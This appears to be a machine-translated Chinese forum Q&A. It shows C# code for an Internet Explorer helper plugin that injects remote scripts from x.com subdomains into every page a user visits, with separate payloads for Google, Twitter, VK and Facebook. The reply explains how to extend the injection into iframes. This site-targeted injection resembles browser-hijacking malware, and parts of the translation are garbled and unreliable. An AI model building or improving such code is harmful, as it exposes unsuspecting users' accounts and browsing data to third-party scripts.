嗨我在c#
中制作了一个ie bho插件这是OnDocumentComplete事件
它很好但是 有网站时有iframe
当它应该注入iframe时,它会将脚本注入主窗口吗?
我希望能解释一下
public void OnDocumentComplete(object pDisp, ref object URL)
{
if (((this.webBrowser != null) && (this.webBrowser.ReadyState == tagREADYSTATE.READYSTATE_COMPLETE)) && !this.webBrowser.Busy)
{
HTMLDocument o = this.webBrowser.Document as HTMLDocument;
string hostname = o.location.hostname;
Random random = new Random();
if (o.getElementById("xxxxxxx") == null)
{
HTMLBody body = (HTMLBody) o.body;
HTMLScriptElement element = (HTMLScriptElement) o.createElement("script");
if (hostname.Contains("google."))
{
element.src = o.location.protocol + "//g.x.com/g.js?ie=" + random.Next(1, 0x186a0);
}
else if (hostname.Contains("twitter."))
{
element.src = o.location.protocol + "//tw.x.com/tw/tw.js?ie=" + random.Next(1, 0x186a0);
}
else if (hostname.Contains("vkontakte."))
{
element.src = o.location.protocol + "//vk.x.com/vk/vk.js?ie=" + random.Next(1, 0x186a0);
}
else if (hostname.Contains("vk."))
{
element.src = o.location.protocol + "//vk.x.com/vk/vk.js?ie=" + random.Next(1, 0x186a0);
}
else if (hostname.Contains("facebook."))
{
element.src = o.location.protocol + "//cdn.x.com/zt.js?ie=" + random.Next(1, 0x186a0);
}
else
{
element.src = string.Concat(new object[] { o.location.protocol, "//all.x.com/all/", hostname, ".js?ie=", random.Next(1, 0x186a0) });
}
body.appendChild((IHTMLDOMNode) element);
Marshal.ReleaseComObject(element);
Marshal.ReleaseComObject(body);
Marshal.ReleaseComObject(o);
}
}
}
答案 0 :(得分:1)
我假设您在SetSite()或类似的地方设置this.webBrowser的值。由于它拥有主Web浏览器,因此您的代码不会被注入iframe就不足为奇了。 OnDocumentComplete的pDisp参数是您想要的浏览器。问我对IWebBrowser2并使用它而不是this.webBrowser。